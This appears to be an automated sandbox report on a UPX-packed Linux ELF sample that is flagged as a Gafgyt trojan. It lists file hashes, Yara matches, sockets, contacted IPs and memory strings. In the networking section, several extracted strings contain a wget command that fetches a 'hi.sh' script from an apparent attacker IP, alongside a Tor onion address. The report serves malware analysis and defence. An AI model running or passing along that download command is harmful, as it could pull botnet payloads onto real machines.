Linux Analysis Report
x86_64.bin.elf

Overview

General Information

Sample name: x86_64.bin.elf
Analysis ID: 1541867
MD5: c309d84aff381e7831ba2bd5ac72d973
SHA1: 95571a6646766419973682da7bb4a7dfbc64b65e
SHA256: bd958006ac58d9e9659025a4800c2dfc7003fb93a8fca4fc1c63f349ad688a60
Tags: elfuser-abuse_ch
Infos:

Detection

Score: 56
Range: 0 - 100
Whitelisted: false

Signatures

Malicious sample detected (through community Yara rule)
Found Tor onion address
Sample is packed with UPX
Detected TCP or UDP traffic on non-standard ports
ELF contains segments with high entropy indicating compressed/encrypted content
Sample contains only a LOAD segment without any section mappings
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Yara signature match

Classification

Networking
barindex
Found Tor onion address
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp String found in binary or memory: disable\\disable\\true\\3\\90\\true\\100|100000\\true\\wget http://185.196.10.215:12234/hi.sh\\ypohwtgf2675muzlafm6zajxd76cirfhe75htwrvadjpf3bm7erri4id.onion\\80\\true
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp String found in binary or memory: disable\\disable\\true\\3\\90\\true\\100|100000\\true\\wget http://185.196.10.215:12234/hi.sh\\ypohwtgf2675muzlafm6zajxd76cirfhe75htwrvadjpf3bm7erri4id.onion\\80\\truex
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp String found in binary or memory: disable\\disable\\true\\3\\90\\true\\100|100000\\true\\wget http://185.196.10.215:12234/hi.sh\\ypohwtgf2675muzlafm6zajxd76cirfhe75htwrvadjpf3bm7erri4id.onion\\80\\true@s
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.23:37932 -> 198.50.207.21:1024
Sample listens on a socket
Source: /tmp/x86_64.bin.elf (PID: 6258) Socket: 127.0.0.1:4628 Jump to behavior
Source: /tmp/x86_64.bin.elf (PID: 6264) Socket: 127.0.0.1:23 Jump to behavior
Source: /tmp/x86_64.bin.elf (PID: 6264) Socket: 0.0.0.0:0 Jump to behavior
Source: /tmp/x86_64.bin.elf (PID: 6264) Socket: 127.0.0.1:80 Jump to behavior
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Source: global traffic TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global traffic TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.207.21
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.207.21
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp String found in binary or memory: http://185.196.10.215:12234/hi.sh
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp String found in binary or memory: http://help.yahoo.com/help/us/shop/merchant/)
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp String found in binary or memory: http://help.yahoo.com/help/us/shop/merchant/)Mozilla/5.0
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp String found in binary or memory: http://help.yahoo.com/help/us/ysearch/slurp)
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp String found in binary or memory: http://help.yahoo.com/help/us/ysearch/slurp)Mozilla/5.0
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp String found in binary or memory: http://http://uhttp://uphttp://upxhttp://upx.http://upx.shttp://upx.sfhttp://upx.sf.nethttp://upx.sf
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp String found in binary or memory: http://upx.sf
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp String found in binary or memory: http://upx.sf.
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp String found in binary or memory: http://upx.sf.n
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp String found in binary or memory: http://upx.sf.neU
Source: x86_64.bin.elf String found in binary or memory: http://upx.sf.net
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp String found in binary or memory: http://upx.sf.nethttp://upx.sf.netCONFIG:
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp String found in binary or memory: http://www.google.com/bot.html)
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp String found in binary or memory: http://www.google.com/bot.html)Mozilla/5.0
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp String found in binary or memory: http://www.googlebot.com/bot.html)
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp String found in binary or memory: http://www.googlebot.com/bot.html)Mozilla/4.0
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 6258.1.000000c000000000.000000c000800000.rw-.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: x86_64.bin.elf PID: 6258, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Sample contains only a LOAD segment without any section mappings
Source: LOAD without section mappings Program segment: 0x400000
Yara signature match
Source: 6258.1.000000c000000000.000000c000800000.rw-.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: x86_64.bin.elf PID: 6258, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: classification engine Classification label: mal56.evad.linELF@0/0@0/0

Data Obfuscation
barindex
Sample is packed with UPX
Source: initial sample String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample String containing UPX found: $Id: UPX 4.02 Copyright (C) 1996-2023 the UPX Team. All Rights Reserved. $
ELF contains segments with high entropy indicating compressed/encrypted content
Source: x86_64.bin.elf Submission file: segment LOAD with 7.8235 entropy (max. 8.0)
Source: x86_64.bin.elf Submission file: segment LOAD with 7.9999 entropy (max. 8.0)
Source: x86_64.bin.elf Binary or memory string: vmCio

No Screenshots

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
198.50.207.21
 unknown Canada
16276 OVHFR false
109.202.202.202
 unknown Switzerland
13030 INIT7CH false
91.189.91.43
 unknown United Kingdom
41231 CANONICAL-ASGB false
91.189.91.42
 unknown United Kingdom
41231 CANONICAL-ASGB false